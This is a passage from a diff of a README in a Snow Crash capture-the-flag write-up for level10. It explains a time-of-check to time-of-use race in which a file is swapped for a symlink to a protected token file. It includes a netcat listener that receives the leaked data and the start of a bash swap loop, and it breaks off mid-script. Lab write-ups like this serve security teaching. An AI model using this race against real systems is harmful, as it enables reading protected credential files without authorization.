Skalyaeve/snow_crash/bonus part/level10/README.md

 Indeed, between the time when the program calls `access(our_file)` and the time when it calls `open(our_file)`, it is possible for us to replace `our_file` with a file of the same name, but which would be a symbolic link to another file.
 As a result, the program will rely on the return of `access(our_file)` to determine whether it can `open(our_file)` or not.

-- So, we will need 3 terminals.
+- Thus, we will need 3 terminals.
 The first one will run `nc -lk 6969 > /tmp/pwn.log` to listen on all IPs through port 6969 and store everything it receives in `/tmp/pwn.log`.

-- In a `while true` loop, the second part will create a file accessible for reading, delete it, and then create a symbolic link with the same name pointing to `/home/user/level10/token`.
+- In a `while true` loop, the second part script creates a file accessible for reading, deletes it, and then creates a symbolic link with the same name, pointing to `/home/user/level10/token`.
 ```bash
 #!/bin/bash
 while true